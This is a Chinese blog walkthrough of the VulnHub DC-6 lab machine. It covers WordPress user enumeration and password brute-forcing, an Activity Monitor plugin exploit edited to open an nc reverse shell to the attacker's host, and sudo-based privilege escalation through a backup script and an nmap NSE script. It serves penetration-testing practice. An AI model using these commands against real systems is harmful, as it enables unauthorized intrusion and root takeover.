IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> vulnhub DC6 靶场练习 -> 正文阅读

[PHP知识库]vulnhub DC6 靶场练习

前言

这次练习的靶机是vulnhub平台下的DC系列靶机第六台,下载地址为https://www.vulnhub.com/entry/dc-6,315/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。

这次在靶机下载的页面,官方给出的线索,在接下来的破解中需要用到这条线索。

在这里插入图片描述

虚拟机配置

这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。

在这里插入图片描述

然后需要溢出CD/DVD选项,启动时候会自动检测并连接CD/DVD,如果连接不上就会导致启动不了虚拟机。当然如果不移除该设备的话,去掉勾选启动时连接也是可以的。

在这里插入图片描述

收集信息

nmap -sn --min-parallelism 200 --min-hostgroup 256 192.168.119.0/24

-sn 代表存活主机扫描,不进行端口测探。

–min-parallelism 代表调整探测报文的并行度,也就是在扫描同一台主机时会发送很多个探测数据包,这个参数指定的数即nmap一次至少要发多少个数据包。

–min-hostgroup 代表调整并行扫描组的大小,也就是一次性同时对多少台主机进行扫描。

更详细内容可以参考:https://zhuanlan.zhihu.com/p/322244582,关于nmap的一些性能参数的学习。

在这里插入图片描述

发现靶机的IP地址为 192.168.119.166,然后用nmap对靶机进行详细地扫描。

nmap -A -sV -p- --min-parallelism 200 192.168.119.166

-A 代表综合性扫描,能收集很多重要的信息

-sV 代表扫描主要的服务信息

-p- 参数p是指定端口,后面的-代表所有端口。

在这里插入图片描述

发现开放了 80端口和 22端口,对于22端口可以尝试一下ssh的暴力破解,对于80端口可以打开网站进行进一步分析。我们还发现了一句 _http-title: Did not follow redirect to http://wordy/,这一句扫描报告在我们挑战DC-2的时候也看到过,这说明直接输入IP是打不开的,需要配置一下hosts文件,设置一下域名wordy到靶机IP的解析。具体原因这里就不细说了,可以看前面博文进行了解:https://blog.csdn.net/rpsate/article/details/119641205

修改hosts文件

首先打开hosts文件:

vim /etc/hosts

然后写入:

192.168.119.166 wordy

在这里插入图片描述

保存并退出,然后在地址栏输入 http://wordy即可打开网站了,注意是 http,不是 https

在这里插入图片描述

暴力破解

针对WordPress网站练习的靶机在前面已经挑战过好几个了,这次我们还是使用老方法,首先枚举出该网站的用户名。

wpscan --url wordy -e u

在这里插入图片描述

枚举出了五个用户名: adminsarahgrahammarkjens,把这个五个用户名保存在一个文件 user.txt里,如下图所示:

在这里插入图片描述

我尝试使用常用密码字典暴力破解,但是没有破解出来,这时候想起了靶机作者的提示:

在这里插入图片描述

作者告诉我们用巨型字典来破解的话我需要五年的时间,我估计我的电脑支撑不了那么久!他还告诉我们把kali自带字典 rockyou.txt中包含k01的密码导出来生成 一本字典的话会节省很多时间。好,那我们现在就把含有k01的密码提取出来。

cat /usr/share/wordlists/rockyou.txt|grep k01 > passwords.txt

cat 表示读取并输出到终端。

| 表示用“|”前面输出的数据给“|”后面命令做处理。

grep 表示用正则表达式匹配数据

> 表示将输出数据写入“>”后面文件。

这一句就是读取rockyou.txt的数据给grep来匹配,匹配到包含k01的数据就写入passwords.txt中。

现在用户名文件和密码字典文件都有了,可以开始暴力破解了。

wpscan --url wordy -U user.txt -P passwords.txt

在这里插入图片描述

已经成功破解出了一个账号的密码。

获取shell

接下来就登陆后台,在后台主题设置模块可以修改php文件,我们可以写入一句话木马到php文件中,然后建立shell。根据经验知道WordPress的后台登陆地址为 /wp-login.php

在这里插入图片描述

但是登陆后没有发现注意设置模块,只能简单的管理帖子评论与普通 账号。但我们还发现了一个插件 Activity monitor,我们可以用searchsploit搜索一下有没有该插件的漏洞。刚刚用wpscan扫描的时候没有扫描出这个插件,所以wpscan的扫描并不是完全准确的。

在这里插入图片描述

searchsploit Activity monitor

在这里插入图片描述

发现了两个漏洞,前面两个并不是WordPress的插件漏洞。下面就尝试一下 45274.html这个漏洞利用文件。

searchsploit -m 45274

将45274.html这个文件复制到当前目录

在这里插入图片描述

然后查看45274.html并修改代码,代码中的一些IP地址是需要修改成自己的IP地址的。

vim 45274

在这里插入图片描述

如上图用红框圈出来的就是在靶机的域名和将要在靶机上执行的命令。首先将域名改成:

http://wordy

然后再看这条命令,很明显就是建立shell的命令,我们把它改成我们熟悉的命令:

nc 192.168.119.130 4443 -e /bin/bash

依然要注意IP地址为自己本机的IP地址。

在这里插入图片描述

修改后保存并退出,然后再本地监听4443端口:

rlwrap nc -lvnp 4443

在这里插入图片描述

然后再用浏览器打开45274.html,打开后的界面如下图所示,我们接着点击页面上的一个按钮。

在这里插入图片描述

点击按钮后再看到监听窗口,发现已经收到了靶机传过来的数据,这时候反弹shell已经建立好了。

在这里插入图片描述

然后对shell升级:

SHELL=/bin/bash script -q /dev/null

这句命令已经在前面详细讲解过了,了解详细内容可以参考:https://blog.csdn.net/rpsate/article/details/119257419

提权

首先尝试了一遍suid提权,没有找到可以提权的文件,然后到配置文件发现了mysql的账号和密码,有道数据库里逛了逛,还是没有发现可以利用的信息。最后在mark的家里发现了一个很重要的文件:things-to-do.txt

cat /home/mark/stuff/things-to-do.txt

在这里插入图片描述

发现了账号 graham的密码为 GSo7isUM1D4,跳转到graham账号看看有什么发现。

su graham

跳转到graham用户后,再尝试一次有没有suid提权或其他一些敏感文件。执行命令:

sudo -l

在这里插入图片描述

我们发现graham可以用jens的身份执行 /home/jens/backups.sh,把 /bin/bash追加到这个文件,然后用jens的身份执行这个文件的时候就会打开一个具有jens权限的shell。

cd /home/jens
echo '/bin/bash' >> backups.sh
sudo -u jens ./backups.sh

在这里插入图片描述

这次切换到了jens用户,我们再次查看一下可不可以使用suid提权,执行 sudo -l查看一下有没有可以提权的命令。

在这里插入图片描述

发现可以用root权限执行nmap,nmap在早期版本是可以用来提权的,我们来尝试一下nmap提权。将提权代码 os.execute("/bin/sh")写入一个文件中。

echo 'os.execute("/bin/sh")' > rootshell.nse

然后以root的权限用nmap执行这个脚本:

sudo nmap --script=rootshell.nse

在这里插入图片描述

现在就已经提权成功了,可以读取最后的flag了。

cd /root
cat theflag.txt

在这里插入图片描述

参考文献

[1] https://zhuanlan.zhihu.com/p/149725645,Kali(渗透工具):WPScan的使用(WordPress扫描工具)

[2] https://blog.csdn.net/zijiaijd/article/details/117165224,nmap提权几种方式

[3] https://blog.csdn.net/rpsate/article/details/119257419,hack the box oopsie 靶场练习

[4] https://zhuanlan.zhihu.com/p/322244582,https://zhuanlan.zhihu.com/p/322244582

[5] https://blog.csdn.net/rpsate/article/details/119641205,vulnhub DC2 靶场练习

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-08-20 14:52:17  更:2021-08-20 14:52:29 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/14 5:33:32-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码